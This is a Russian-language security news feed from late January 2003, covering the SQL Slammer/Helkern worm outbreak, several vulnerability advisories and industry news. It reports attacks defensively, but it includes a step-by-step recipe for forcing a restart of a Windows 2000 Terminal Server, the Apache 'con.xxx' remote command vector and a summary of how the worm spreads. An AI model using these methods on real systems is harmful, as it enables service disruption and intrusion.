Timo Sirainen из Финляндии сообщает об обнаружении уязвимости а ПО SpamAssassin, предназначенном, как следует из названия, для защиты от спама почтовых серверов. Послав специально оформленное почтовое сообщение, злоумышленник имеет возможность выполнить произвольный код на сервере. Уязвимость присутствует при запуске демона SpamAssassin - spamc в режиме BSMTP (опция -B). Связана с некорректной обработке символов "." в строках. Таким образом возникает возможность заполнения буфера "точками" (".") с последующей перезаписью адреса фрейма стека. Как указывается, особенно подобная уязвимость критична для связки Exim+SpamAssassin, ввиду того, что в HOWTO рекомендуется запускать spamc именно с ключом -B. Обнаружена в версиях 2.40 - 2.43. Источник - http://www.securityfocus.com
27/01/2003 08:44 Субботний вирус может вновь ожить в понедельник.
Эксперты по компьютерной безопасности предупреждают: вирус, в субботу поразивший некоторые узлы всемирной компьютерной сети Интернет, может возобновить свою деятельность в понедельник, сообщает BBC News. В Южной Корее - самой "интернетизированной" стране мира, где доступ к сети имеет почти три четверти населения, системные инженеры различных организаций до сих пор борются с последствиями действия вируса, затормозившего на несколько часов работу крупных интернет-узлов. Министр информации Южной Кореи Ли Санг-Чул (Lee Sang-Chul) в связи с этим заявил: "Проблема с вирусом не решена полностью, и мы впредь должны будем больше внимания отводить вопросам безопасности". По данным Associated Press, только за субботу червь "Helkern" (по терминологии eEye Digital Security название червя "Sapphire") поразил 39 тысяч компьютеров во всем мире, нарушив работу множества крупных корпораций. Однако тот факт, что червь был запущен в выходной день, когда основная часть корпоративных сетей не работает, уменьшил вредоносные последствия этого вируса. http://news.bbc.co.uk/2/hi/technology/2696131.stm
26/01/2003 19:22 Неизбежность провала: неверные предположения о безопасности в современных компьютерных системах.
На сайте Дмитрия Леонова www.bugtraq.ru опубликована статья "Неизбежность провала: неверные предположения о безопасности в современных компьютерных системах", являющаяся переводом статьи, написанной Питером Лоскоко (Peter Loscocco) и других специалиством Агенства Найиональной Безопасности США (National Security Agency). Перевод выполнен Ильмаром Хабибулиным. Целью данной статьи является возобновление интереса к защищенным операционным системам, чтобы последующие попытки обеспечения компьютерной безопасности базировались на более прочной основе. В статье указываются несколько возможностей защищенных операционных систем, которые отсутствуют в основных современных ОС, доказывается необходимость этих возможностей для адекватной защиты более общих механизмов обеспечения безопасности прикладного уровня, а также приводятся конкретные примеры того, как сильно существующие решения в области обеспечения безопасности зависят от этих возможностей. Статья - http://www.bugtraq.ru/library/security/failure.html
26/01/2003 18:14 Борьба с флудом на маршрутизаторе Cisco.
На сайте opennet.ru выложена ссылка на довольно любопытную статью, которая может представлять интерес для администраторов маршрутизаторов CISCO. В статье "Closing the Floodgates: DDoS Mitigation Techniques" можно найти описание нескольких премов для защиты от DoS и DDos (distributed denial of service - распределённые атаки на сервисные службы) атак. Так же рассказывается, как определить что ваша сеть подверглась именно DDoS атаке (диагностика), что предпринять в первую очередь для защиты. Ссылка - http://online.securityfocus.com/infocus/1655
26/01/2003 17:54 Microsoft открыла счет уязвимостей в новом году.
Корпорация Microsoft выпустила первый в этом году бюллетень безопасности, MS03-001. Инженер компании Next Generation Security Software Дэвид Литчфилд (David Litchfield) обнаружил, что контроллеры доменов Windows NT 4.0, 2000 и XP имеют уязвимость, позволяющую исполнять свой код на удаленной машине. Уязвимость вызвана отсутствием проверки буфера в сервисе Locator, который используется при удаленном вызове процедур (RPC) для нахождения соответствия логического имени устройства сетевому имени. Например, если принтер имеет на компьютере логическое имя laserprinter, RPC-клиент, вызывающий Locator, получает сетевое имя этого же принтера. Отсутствие проверки переполнения буфера приводит к тому, что в качестве аргументов сервиса можно передать специально сформированную строку, содержащую исполняемый код. В памяти удаленного компьютера "хвост" буфера, который должен быть обрезан при проверке длины, накладывается на область данных программы, и на него, изучив код, можно передать управление. Особенно опасной эта возможность представляется для контроллеров домена Windows NT 4.0 и 2000, где сервис установлен по умолчанию. В Windows XP он после установки системы отключен. Вместе с бюллетенем корпорация выпустила "заплатку", устраняющую уязвимость. Информация взята с сайта РБК (www.cnews.ru). Бюллетень - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-001.asp
26/01/2003 17:38 Что нового в FreeBSD 5.0?
Как известно, версией 5.0 команда разработчиков FreeBSD открыла новую ветвь популярной, высокопроизводительной ОС для серверов. От выхода предыдущей глобальной ветви FreeBSD прошло уже 2 года. Дэвид Джонсон представил широкой общественности статью "FreeBSD 5.0 offers many new benefits", в которой рассматривает основные новшества и усовершенствования, включённые в новую версию FreeBSD. Но, честно говоря, некоторые специалисты всё-таки советуют пока не использовать новую версию FreeBSD на критичных высокопроизводительных версиях, ввиду её "сырости" и реокмендуют там пока использовать версию 4.7. Cтатья - http://www.bsdnewsletter.com/2003/01/Features68.html
26/01/2003 16:24 Кибер-война в Интернет.
Война между Пакистаном и Индией уже давно ведётся в Интернет. Как свидетельствует статистика, пакистанские хакеры каждый месяц взламывают по 40-50 сайтов, находящихся на территории Индии. На днях 18-летний "этический хакер" (как он себя называет) Ankit Fadia представил правительству 25-страничный документ, содержащих адреса многих пакистанских хакеров, которые называют себя "хактивистами" ('hactivists'). Несмотря на свою юный возраст, Анкит оказывает консультационные услуги различным разведывательным, военным, правительственным и частным учреждениям, включая ФБР и ЦРУ. Также Анкит известен тем, что в 14-летнем возрасте издал руководство под названием "Неофициальное руководство по этическомй хакерству" (`unofficial guide to ethical hacking'). О составленном документе с адресами пакистанских хакеров Анкит сообщил журналистам в Хайдарабаде в пятницу. Подробности - http://www.indiaexpress.com/news/technology/20030124-0.html
26/01/2003 13:43 Сканер SQL-червя.
Следуя многочисленным просьбам трудящихся со всего мира, eEye Digital Security, следую свои традициям, выпустила сканер, позволяющий найти уязвимые для червя системы. Подчёркивается, что сканер не обладает деструктивными свойствами, а только определяет потенциально уязвимую систему. Также подчёркивается, что сканер (в силу природы червя) не определяет УЖЕ ЗАРАЖЁННЫЕ системы. Для определяения подобных систем рекомендуется применять снифферы и IDS, способные обнаружить подозрительные траффик, возникающий при заражении (червь пытается себя распространить дальше и генерирует попытки соединения на случайные IP на 1433, 1434 UDP-порты). Также автор просит всех, кто заметит какие-либо ошибки в работе сканера обращаться к нему (Marc Maiffret). Сканер - http://www.eeye.com/html/Research/Tools/SapphireSQL.html
26/01/2003 13:06 Анализ кода червя от Matthew Murphy (номер 2).
Известный исследователь компьютерной безопасности Matthew Murphy (mattmurphy@kc.rr.com) также произвёл анализ исходного кода червя Sapphire. Помимо описанной eEye технологии, им было замечена интересная особенность в секции генерации UDP-пакетов. Указывается, что атакуемые хосты/сети могут генерировать ICMP-сообщение "Host/Port Unreachable" при атаке Sapphire-червем, тем самым увеличивая и без того немаленький траффик в сети. Также была замечена генерация 26-байтовых TCP-SYN-пакетов в адрес жертвы атаки. Ещё один анализ червя - http://www.techie.hopto.org/sqlworm.html
26/01/2003 12:47 Подробный анализ кода червя (номер 1).
В BUGTRAQ развернулась очень широкая дискуссии об этичности написания червей, подобных тому, который поразил в субботу многие сайты в Интернете (по данным Symantec, например, пострадало около 22 тыс. серверов, также сообщается о выходе из строя сети крупнейшего банка Bank of America). Об опубликовании анализа исходного кода червя объявила известная фирма eEye Digital Security. Червь этой компанией был назван SQL Sapphire. Для краткого описания дествий вируса позволим себе воспользоваться прекрасным переводом на сайте www.securitylab.ru. Итак, действия выполнеямые червем: Отыскивает адрес GetProcAddress и Loadlibrary от IAT в sqlsort.dll; Вызывает gettickcount, и возвращает счетчик как начальное псевдослучайное число; Создает UDP сокет; Исполняет простую псевдо формулу для получения случайного числа, используя возвращенное значение gettickcount, чтобы генерировать IP адрес, который будет позже использоваться как адресат; Посылает код заражения к SQL Server Resolution Service на 1434 UDP порту; Продолжает дальше генерировать псевдослучайные адреса и пытаться заражать их. Уязвимость можно устранить, установив SP3 (http://www.microsoft.com/sql/downloads/2000/sp3.asp) для SQL server 2000 или MS02-039. Анализ кода Sapphirehttp://www.eeye.com/html/Research/Flash/AL20030125.html
26/01/2003 12:21 Вирус, замедливший работу Интернета, опознан и остановлен.
Неизвестный вирус, поразивший в субботу утром международную информационную сеть Интернет, оказался программой "Helkern", принадлежащей к классу так называемых "бестелесных" червей. Об этом говорится в специальном сообщении, размещенном на сайте "Лаборатории Касперского". Червь "Helkern" (иначе известный под именем "Slammer") заражает серверы под управлением системы баз данных Microsoft SQL Server 2000, которая широко используется на Web-серверах. Домашним пользователям, которые не устанавливали у себя Microsoft SQL Server 2000 самостоятельно, червь не грозит. Одну из самых серьезных угроз нормальной работе интернета за последние годы составляют относительно небольшой размер программы "Helkern" (367 байт), уникальная технология заражения и исключительно высокая скорость распространения вируса. Будучи "бестелесным", "Helkern" осуществляет все операции, включая распространение и заражение, исключительно в системной памяти компьютера. В результате обычные антивирусные средства (сканеры) не могут обнаружить и нейтрализовать его. Червь незаметно проникает на компьютеры через брешь класса "переполнение буфера" (Buffer Overrun) в системе безопасности Microsoft SQL Server. Для этого на целевой компьютер посылается нестандартный запрос, при обработке которого система автоматически выполняет и содержащийся в запросе код червя. После этого "Helkern" начинает процедуру дальнейшего распространения по сети Интернет. Этот процесс отличается исключительно высокой скоростью рассылки копий червя: "Helkern" запускает бесконечный цикл распространения, и, таким образом, многократно повышает сетевой трафик. Других побочных действий, в том числе деструктивных", червь не имеет. Нечто подобное, по оценке специалистов, происходило в мире в июле 2001 года, когда в сети появился первый "бестелесный" червь CodeRed, также вызвавший широкомасштабную эпидемию. По данным Associated Press, только за субботу червь "Helkern" поразил 39 тысяч компьютеров во всем мире, нарушив работу множества крупных коропораций. Однако тот факт, что червь был запущен в выходной день, когда основная часть корпоративных сетей не работает, уменьшил вредоносные последствия этого вируса. В настоящее время, по оценкам специалистов, эпидемия червя "Helkern" может считаться остановленной. Подробнее - http://www.kaspersky.ru/news.html?id=1193624
26/01/2003 12:03 Топ-лист спама-2002.
2002 год был рекордным в истории по количеству рассылаемых непрошеных сообщений. Согласно исследованиям MessageLabs, в прошлом году каждое двенадцатое электронное письмо содержало спам. Согласно статистике американской компании Surf Control, спам составляет сегодня порядка 30% всей электронной корреспонденции и наносит ущерб, который оценивается в девять миллиардов долларов в год. Недавно Surf Control опубликовала своеобразный топ-лист спамерских тем, которые являются наиболее утомительными для пользователей интернета. Лидером хит-парада стали предложения посетить различного рода порно-сайтам. На втором месте - предложения фармацевтических компаний, призывающие купить их медикаменты по самой дешевой цене (Виагру). Также в начале списка стоят предложения, призывающие жертвовать деньги в помощь голодающим и болеющим нациям Африки. В десятку победителей также вошли темы "как улучшить условия вашего кредита", "лучшее онлайн казино", знакомства, копирование DVD и др. Источник - http://www.viruslist.ru
26/01/2003 11:06 Организация по компьютерной безопасности рассылает вирус.
Скандинавская компания по компьютерной безопасности Norway's Data Inspectorate признала, что в ее сообщениях с рекомендациями по компьютерной безопасности содержался вирус FunLove. Вирус был разослан более чем 1700 подписчиков компании. Вирус FunLove проник во внешний почтовый сервер и, воспользовавшись данными контактного листа, начал немедленно распространять себя по адресатам. После того как стало известно о произошедшем недоразумении, специалисты службы безопасности Norway's Data Inspectorate сразу же выключили систему рассылки сообщений. Однако было уже поздно - вирус разослал себя пот всем адресатам. "FunLove" впервые был обнаружен в "диком виде" в ноябре 1999 года. Он представляет собой неопасный резидентный паразитический Win32-вирус, который работоспособен под операционными системами Windows 95, Windows 98 и Windows NT. Вирус заражает PE EXE файлы (выполняемые файлы Windows) на локальных и сетевых дисках. Благодаря своей способности размножаться по локальной сети, вирус может инфицировать всю корпоративную сеть с одной рабочей станции, если ей предоставлены права записи на сетевые диски. (Подробное описание вируса см. здесь). Источник - http://www.ananova.com
25/01/2003 23:10 Linuxworld: Все средства сетевой безопасности в одной программе.
Linuxworld стала первым балом для четвёртой версии Astaro Security Linux. Это популярное ПО сетевой безопасности установлено более чем на 10000 компьютерах в 60 странах, включая такие организации, как Electronic Data Systems, Лос-Аламосская национальная лаборатория и Стэнфордский университет. Пакет Astaro Security Linux V4 содержит все средства защиты компьютера: брандмауэр, шлюз VPN, спам- и контент-фильтры, а также антивирусную программу. Основные заказчики Security Linux - предприятия малого и среднего бизнеса. ПО может исполняться на любом сервере на базе процессора от Intel. Новые функции включают в себя поддержку VLAN и WLAN, антивирусную защиту учётных записей POP3, анализ почты на предмет обнаружения спама с привлечением эвристических методов. Для идентификации удалённых пользователей введена поддержка протоколов Radius и LDAP. Брандмауэр, входящий в пакет, может препятствовать таким DoS-атакам, как потоки SYN- и UDP-пакетов, использование методов Smurf и Trinoo, подмена IP-адресов. Идентификация пользователей VPN производится по протоколу IPsec с использованием распределённых ключей, причём протокол PPTP (Point-to-Point Tunneling Protocol) обеспечивает 128-битное шифрование. Пропускная способность сети VPN составляет 115 Мбит/с, брандмауэра - до 735 Мбит/с (данные для сервера на процессоре с частотой 1266 МГц). Подробности - http://www.compulenta.ru/2003/1/24/37070/
25/01/2003 21:55 Ещё один вариант дизассемблированного кода червя.
Продолжая тему, поднятую мировыми информационными агенствами, хотялось бы привести ссылку на дизассемблированный код червя. Сию нелёгкую работу выполнил cstone@pobox.com. Кроме того, обнаружена сигнатура червя, которую рекомендуется включить в IDS (системы опредения попыток вторжения). Сигнатура заразы имеет следующий вид - Qh.dllhel32hkernQhounthickChGeTf.llQh32.dhws2_f.etsockf.to.Qhsend. Код - http://www.boredom.org/~cstone/worm-annotated.txt
25/01/2003 14:27 Некоторые подробности о новом черве, поразившем Интернет.
Как стало известно из списка рассылки BUGTRAQ, в результате действий нового червя были поражены несколько магистральных каналов. Сообщается также о выводе из строя сетей в Австралии, США, Канаде. Анализ действий червя позволил сделать вывод, что он использует уязвимость в MS SQL-сервере. При этом на порт UDP 1434 посылается пакет длиной 376 байт. Анализ кода червя уже предварительно произведён. Рекомендуется: перекрыть доступ к порту 1434/UDP (некоторые специалисты рекомендуют также к 1433) cнаружи при помощи файрволлов. Если нет возможности, выключить службы SQL на серверах! Природа червя (распространение посредством протокола UDP) способствует высокой скорости распространения червя. Администраторам MS SQL-серверов НАСТОЯТЕЛЬНО рекомендуют применить патч от Microsoft! Примечательно то, что об уязвимости в MS SQL 2000 сообщалось ещё в июле прошлого года. Описание уязвимости - http://www.nextgenss.com/advisories/mssql-udp.txt Патч от Microsoft - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-039.asp Пердварительный анализ червя - http://www.digitaloffense.net/worms/mssql_udp_worm/
25/01/2003 13:21 Интернет атакован неизвестным вирусом.
Новость, несколько перекликающаяся с предыдущей, однако по масштабам более катастрофическая. В субботу утром неизвестный пока вирус вывел из строя существенную часть Интернета, сообщает BBC News. По сведениям агентства Associated Press, эксперты предполагают, что вирус распространялся через компьютеры, на которых был установлено программное обеспечение SQL Server корпорации Microsoft. Последствия этой атаки сравнимы с результатами действий вируса Code Red, практически парализовавшего Интернет в 2001 году, хотя и уступают ей по масштабам. Больше всего пострадала Южная Корея, которая на несколько часов осталась без Интернета. Между тем, аналитики отмечают, что ущерб, нанесенный вирусом, сравнительно мал, так как учреждения и корпорации, обычно больше всего страдающие от подобных атак, в субботу не работают. За ситуацией следят эксперты по компьютерной безопасности Центра защиты национальной инфраструктуры ФБР и Центра координации CERT. Подробности - http://news.bbc.co.uk/2/hi/technology/2693925.stm
25/01/2003 12:18 Хакеры отключили от Интернета Южную Корею.
Республика Корея в течение нескольких часов была отрезана от доступа в Интернет. Как сообщает ИТАРТАСС, это первый случай, когда действия «кибер-террористов» отразились в общенациональном масштабе. Блокирование Интернета началось примерно в 14:00 по местному времени с ведущих телекоммуникационных корпораций «Эс-Кей Телеком» и «Кей-Ти-Эф», а уже через час были парализованы практически все фирмы. Их серверы один за другим подвергались массированной перегрузке и отключались, не справляясь с избыточным количеством обращений, посланных хакерами. Частично восстановить операции удалось только к 17 часам, но и тогда, доступом в сеть обладали всего около 10 процентов пользователей. Министерство информации и связи Республики Корея говорит о почти 100-процентной уверенности в том, что «это дело рук хакеров, развернувших массовую атаку на всю интернет-систему страны». Источник - http://www.ntv-tv.ru
24/01/2003 17:34 О порядочности некоторых российских программистов.
Проблема защиты интеллектуальной собственности актуальна во всём мире, и в нашей стране, особенно. Как известно, многие программисты пишут свои программы на условиях shareware и freeware. Член нашей команды (UINC) NEOx написал программу под названием CD Speed, которая была выложена для свободного пользования на нашем FTP-сервере вместе с исходными текстами. Также в качестве примера исходники выкладывались на различных сайтах, посвящённых программированию. Каково же было его удивление, когда он обнаружил, что программа, над которой он долго работал, была выложена на сайте господина Соколова Алексея Юрьевича (E-mail: a9084810@mtu-net.ru) cо ссылкой на Соколова А.Ю. в качестве разработчика этой программы! Особо примечательным является тот факт, что этот, с позволения сказать, "программист" посчитал своим долгом, даже не разобравшись с работой компилятора (об этом говорит размер CD Speed (оригинал NeOx - 15КБ, размер программы Соколова - 108 КБ + ещё библиотеки, которые пришлось приложить плагиатору), который он скомпилировал - кстати, скомпилирована была даже не окончательная, а отладочная версия) выложить программу под своим именем. В проведённой потом с Соколовым перепиской, им было указано, что в файле readme не было указано на ограничения на пользование программой и поэтому, якобы, он имеет полное право перекомпилировать программу и выложить ее под своим именем. Однако, нам кажется, что тут дело касается личной порядочности каждого программиста и поэтому поступок Соколова выглядит очень некрасиво с этической точки зрения. Мы, со своей стороны, можем предложить господину Соколову для повышения собственного мастерства компиляции и поднятия собственного рейтинга ещё несколько программ, в которых NeOx не вставил фразы об условиях распространения исходных текстов. Источник - http://www.uinc.ru
24/01/2003 15:26 Microsoft вооружит министерство обороны Израиля новыми программами.
Корпорация Microsoft заключила контракт с министерством обороны Израиля на поставку и обслуживание новейшего программного обеспечения, сообщается на сайте World Tribune. Сделка, сумма которой составляет 20 миллионов долларов, вызвала беспокойство у соседствующих с Израилем арабских стран. В дипломатических кругах распространяются слухи о том, что Microsoft оказывает помощь израильским спецслужбам взламывать компьютерные сети арабских военных ведомств. На некоторых арабских сайтах Microsoft обвиняется в предоставлении Израилю специальных программ для интернет-шпионажа. Подробности - http://www.worldtribune.com/worldtribune/breaking_5.html
24/01/2003 15:14 Обзор браузеров под Linux.
Как сообщается на сайте opennet.ru, на украинском сервере mycomp,com.ua появилась статья Сергея Яремчука "Братство браузеров", в которой автор попытался сравнить и описать наиболее популярные в Linux web-браузеры: консольные - Lynx, Zen и Links, браузеры под X-Window: Netscape 7, Mozilla, Opera и Konqueror. Описываются так же браузеры основанные на коде мозиллы - Beonex и Рhoenix, и не забываются мини-браузеры: Skipstone, Barque, Dillo и Cheetah. Статья - http://www.mycomp.com.ua/article.php?id=4123
24/01/2003 14:04 Начинается бета-тестирование SP4 для Windows 2000.
В ближайшее время компания Microsoft планирует начать тестирование бета-версии четвертого пакета обновлений (Service Pack 4) для операционной системы Windows 2000. Набор бета-тестеров для работы с четвертым пакетом обновлений был объявлен еще в октябре 2002 года, однако появление официальной бета-версии постоянно откладывалось. По данным Inquirer, на некоторых пиратских сайтах уже появились ранние альфа-версии Service Pack 4. Дата официального представления нового пакета обновлений для самой распространенной корпоративной операционной системы пока неизвестна, поскольку бета-тестирование этого пакета Service Pack 4 пока не началось. Специалисты полагают, что в ближайшее время можно ожидать появления массы неофициальных "релизов" четвертого пакета обновлений, а также споров относительно того, что именно стоит включить в официальную версию Service Pack 4. Одно можно сказать с уверенностью: после выпуска этого пакета обновлений представители Microsoft в очередной раз объявят, что вошедшие в его состав обновления позволят существенно повысить безопасность и надежность Windows 2000. Источник - http://www.compulenta.ru/2003/1/24/37060/
24/01/2003 13:01 IBM Developerworks опубликовала пособие по User Mode Linux.
Вчера на IBM Developerworks появилось "Введение в User-Mode Linux" от Carla Schroder. В создании документа так же принимал участие Jeff Dike - создатель User-Mode Linux. UserMode Linux - это ядро Linux, предназначенное для запуска в виде обычного процесса. В результате получается виртуализированное Linux-окружение, с которым можно проделывать различного рода эксперименты (например ставить/тестировать новые дистрибутивы, моделировать различные фатальные события и т.п.), использовать для предоставления виртуального хостинга с предоставлением пользователям полного контроля над их виртуальными машинами и т.п. Новость опубликована пользователем green на сервере linux.org.ru Пособие - здесь
24/01/2003 12:27 DoS-атака в Windows 2000 Terminal Server.
Jonathan Hunter из Великобритании сообщает о возможности перезапуска сервера под управлением Windows 2000 Terminal Server любым пользователем, подключившимся через RDP или ICA, и имеющем доступ к локальной файловой системе. Для выполнения перезапуска автор предлагает следующий сценарий: 1. Открыть %SYSTEMROOT%\SYSTEM32\MSGINA.DLL для обеспечения исключительного доступа с блокировкой чтения (автор использовал Radsoft's HEXVIEW.EXE). 2. Открыть ещё одно соединение через RDP или ICA. 3. Нажать кнопку "Restart" в появившемся диалоговом окне ("msgina.dll failed to load") - сервер перезагрузится. Тестировалось на Windows 2000 Server (IE55, SP2) и Windows 2000 Server (IE55, SP3). В качестве защиты предлагается убрать полномочия файла MSGINA.DLL для "Power Users", "Users" и "Everyone". Источник - http://online.securityfocus.com
24/01/2003 12:03 Новый тип уязвимости Web-приложений?
Как указывает калифорнийская фирма WhiteHat Security,Inc. (занимается безопасностью Web-приложений), сотрудниками фирмы был обнаружен новый тип уязвимости Web-приложений под названием Cross-Site Tracing (XST). Заключается она в том, что используя отладочный компонент протокола HTTP под названием TRACE, возникает возможность отслеживать маршрут пользователя по сайтам и получать другую информацию о пользователе. По поводу этой технологии разгорелась довольно оживлённая дискуссия в BUGTRAQ - в частности, Thor Larholm из PivX Solutions (известен обнаружением многих ошибок в IE и созданием базы данных о непропатченный ошибках IE) указывает, что ничего нового в этой технологии нет, а представляет она собой только несколько переиначенную уязвимость XSS. О самом описании он говорит, что это - "hyped, sensationalised snakeoil". Впрочем, другой исследователь безопасности, Peter Watkins, придерживается противоположного мнения, указывая, что указанная особенность работает и в броузере Mozilla. В общем, как бы то ни было, документ, несомненно, заслуживает внимания. Выпущен в PDF-формате. В ссылке ниже есть указания на 3 зеркала, с которых можно скачать описание. Подробности - http://www.whitehatsec.com/news.html
24/01/2003 11:39 Статья "Обновление FreeBSD посредством cvsup".
На сайте bsdvault.net опубликована статья "How to update your system from 4.x to FreeBSD 5.0 using cvsup", подробно описывающая, как обновить FreeBSD через cvsup и пересобрать систему. Описание ведется в контексте перехода с FreeBSD 4.x на FreeBSD 5.0. Новость опубликована на linux.org.ru. Статья - http://bsdvault.net/sections.php?op=viewarticle&artid=109
24/01/2003 11:23 Уязвимости в Apache.
После выхода версии 2.0.44 Вэб-сервера Apache стали известны подробности уязвимости в предыдущих версиях ветви 2.0. Основная ошибка заключается в некорректной обработке (разборе) одной из подпрограмм разбора путевого имени вызываемых файлов. Использование уязвимости может привести как к DoS, так и возможности, в некоторых случаях, выполнения произвольного кода на уязвимой системе. Сама уязвимость может быть использована тремя способами: 1. Ошибки проверки функции ap_directory_walk - обратившись к зарезервированному устройству 'aux' можно получить DoS (выпущен соотв. эксплоит - Apache2-nuke.pl). 2. Перенаправление входных данных CGI - при посылке POST к "con.xxx" в каталоге ScriptAlias, данные запроса POST будут выполнены CGI интерпретатором, при этом возникает возможность удалённого выполнения команд на сервере. 3. Обход заданного по умолчанию режима отображения сценариев. Необходимо отметить, что первые 2 уязвимости присутствуют только на Win9.x-системах, третья присутствует во всех ОС. Указывается также, что все описанные уязвимости присутствуют только в версиях ветви 2.0 до 2.0.44. В версии 1.3.27 (как и в остальных версиях ветви 1.х) уязвимости нет. Также для предотвращения третьей уязвимости предлагается произвести изменения в конфигурационном файле Apache в секции, связанной с директориями, поддерживающими аплоад (закачку файлов) (например, Directory "/var/apache/htdocs/uploads/"). Источник - http://online.securityfocus.com
24/01/2003 11:03 Уязвимость в цепочке сертификатов IE.
Как пишет BUGTRAQ Alex Loots из Голландии, у него возникли серьёзные претензии к пачту Microsoft MS02-050, описывающем уязвимость в обработке цепочки сертификатов броузером Internet Explorer. Алекс указывает, что после применения заплатки он решил проверить работу IE с цепочкой сертификатов, сформировав заведомо фальшивый сертификат, сгенерированный 19-08-2002. Второй сертификат в цепочке доверия Вэб-сайта ограничивался сроками 17-08-2002 - 16-11-2002. При проверке всей цепочки 20-01-2003 IE выдал сообщение только о просроченности времени действия сертификата, при этом не указав на его неправомочность. Большинство пользователей в подобных ситуациях просто указывают броузеру продолжать работать с просроченным сертификатом. Однако при изменении системной даты на время действия сертификата действительно происходит блокирование доступа к Вэб-сайту, при этом просто высвечивается стандартная страница ошибки IE или DNS, что опять же не информирует рядового пользователя о злонамеренном сертификате. Таким образом, автор делает вывод о некорректность работы патча. Тестирование производилось на полностью патченной системе W2KPro и IE5.0. Источник - http://www.securityfocus.com
24/01/2003 10:51 Генеральный прокурор Нью-Йорка добился осуждения спамеров из MonsterHut.
Генеральный прокурор Нью-Йорка Элиот Спитцер (Eliot Spitzer) приветствовал решение Верховного Суда Манхеттена о запрете компании MonsterHut и, в частности двум ее руководителям - Тодду Пилоу (Todd Pelow) и Джери Хертлу (Gary Hartl), заниматься "мошеннической, обманной и нелегальной деятельностью и практикой" в области рассылки рекламы по электронной почте. В мае прошлого года Элиот Спитцер предъявил компании иск, обвиняя ее в мошенническом предложении услуг рассылки рекламы по электронной почте. Компания оказывала такие услуги, однако делала это в виде анонимного спама. Согласно информации, собранной офисом генпрокурора, компания с января 2001 года отправила более 500 миллионов писем. Кроме того, она не отреагировала на требование 750 тысяч человек об исключении их из списка рассылки. Незадолго до решения суда PaeTec, интернет-провайдер компании, отключил ее от сети после выигрыша другого иска, обвинявшего MonsterHut в нарушении условий пользования услугами, а именно пункта о запрете рассылки спама. Эх, нам бы в Россию такого прокурора! :) Источник - http://www.internetnews.com
24/01/2003 10:35 Сенатор США предложил законопроект об усилении стандартов безопасности в государственных компьютерных системах.
Сенатор Джон Эдвардс (John Edwards) представил законопроект, в котором от Национального института стандартов и технологий США (NIST) требуется повысить стандарты на безопасность федеральных информационных ресурсов. "Закон о ведущей роли государственных организаций в информационной безопасности" (Cybersecurity Leadership Act) предполагает пересмотр стандартов в сторону увеличения требований к ним после того, как федеральные агентства проведут анализ своих сетей и систем. Таким образом, существующие уязвимости перестанут соответствовать нынешним стандартам и должны исчезнуть. Несмотря на то, что от всех федеральных агентств требуется регулярно анализировать безопасность своих компьютерных систем еще с 2000 года, они, по словам Эдвардса, проходят неудовлетворительно. К тому же, федеральное правительство подает плохой пример бизнесменам, не заботясь о своих данных на должном уровне. Источник - http://www.cnews.ru
23/01/2003 16:10 Переполнение буфера в Locator service в Microsoft Windows 4.0/2000/XP.
Microsoft Locator service – служба имен, которая позволяет пользователю найти в корпоративной сети других активных пользователей. Сервис поставляется с Windows NT 4.0, Windows 2000, и Windows XP. По умолчанию, служба Locator включена только на контроллерах домена Windows 2000 и Windows NT 4.0. В Locator service обнаружена возможность удаленного переполнения буфера. Посылая специально сформированный запрос с Locator service, атакующий может аварийно завершить работу службы или выполнить произвольный код с системными привилегиями. Уязвимость обнаружена в Microsoft Windows NT 4.0, Windows 2000, Windows XP. Подробнее - http://www.securitylab.ru/?ID=35520
23/01/2003 15:46 Уголовное дело против Масяни.
Эта новость, скорее, из разряда занимательных. На создателей популярных в интернете мультфильмов про Масяню хотят подать в суд. Юрист клуба Reznik.ru Андрей Тюкалов направил в прокуратуру заявление о возбуждении уголовного дела. В заявлении утверждается, что во многих мультфильмах незаконно использовалась чужая музыка. Как сообщил Тюкалов интернет-изданию Runet.ru, он представляет интересы одного из пострадавших. Кто именно это был, он не уточняет. В заявлении упоминаются песни "Сплин", Deadly Avenger, Morcheeba, Small World и Lamb. Тюкалов надеется, что о возбуждении уголовного дела станет известно уже на следующей неделе. Автор мультфильмов о Масяне Олег Куваев уже прокомментировал происшедшее по просьбе интернет-издания "Вебпланета". Он относится к нападкам со стороны юристов спокойно, и лишь недоумевает, кому это нужно. Тем не менее, в ближайшее время старые мультфильмы будут переозвучены, и "нелегальной" музыки в них не останется. "В коммерческом продукте (ТВ-серии, видеокассеты, сборник на CD) у нас всё переозвучено", - сказал Куваев. Заявление господина Тюкалова - http://www.reznik.ru/proekt/masya.htm
23/01/2003 15:05 Методы обнаружения подмены MAC-адреса в WLAN.
Joshua Wright из Johnson & Wales University опубликовал довольно любопытный документ, описывающий методы обнаружения случаев подменs MAC-адреса (48 битный идентификатор сетевой карты) в беспроводных сетях - WLAN, они же 802.11 сети. Подобный фокус может быть выполнен при помощи инструментов Wellenreiter, FakeAP и AirJack, например. Документ представлен в PDF-формате. Статья - http://home.jwu.edu/jwright/papers/wlan-mac-spoof.pdf
23/01/2003 14:57 Очередной семинар SoftLine.
Фирма SoftLine приглашает всех желающих принять участие в бесплатном семинаре "Введение в Active Directory и безопасность файловой системы в Microsoft Windows 2000". Семинар будет посвящен обзору возможностей безопасного хранения данных и доступа к файлам и папкам на томах NTFS операционной системы Windows 2000. Основные вопросы: разрешения NTFS, шифрование файлов с помощью EFS, дисковые квоты, аудит файловых ресурсов, обзор инструментов управления безопасностью Windows 2000. Также будут рассмотрены компоненты службы каталогов Active Directory и методы администрирования. г.Москва, ул. Губкина, д. 8 Математический институт им. Стеклова. Начала регистрации в 9.30. Обращение к SoftLine. По поводу оплаты за рекламу просьба обращаться на контактный E-mail. ;) И ещё просьба - плюшек побольше приносить. Подробности - тута
23/01/2003 14:22 Уязвимость в IRIX ToolTalk RPC Server.
SGI Inc. сообщает об уязвимости в ToolTalk RPC-сервере в своём бюллетене 20021102-01-P. Для устранения уязвимости выпущен обновлённый патч, так как сообщается о некорректности работы патча в некоторых случаях. Рекомендуется для версий IRIX 6.5.13-6.5.17 применить патч 4869, либо обновиться до версии 6.5.18. Подробности - ftp://patches.sgi.com/support/free/security/advisories/20021102-01-P
23/01/2003 14:05 Уязвимость в драйверах принтеров Mandrake Linux.
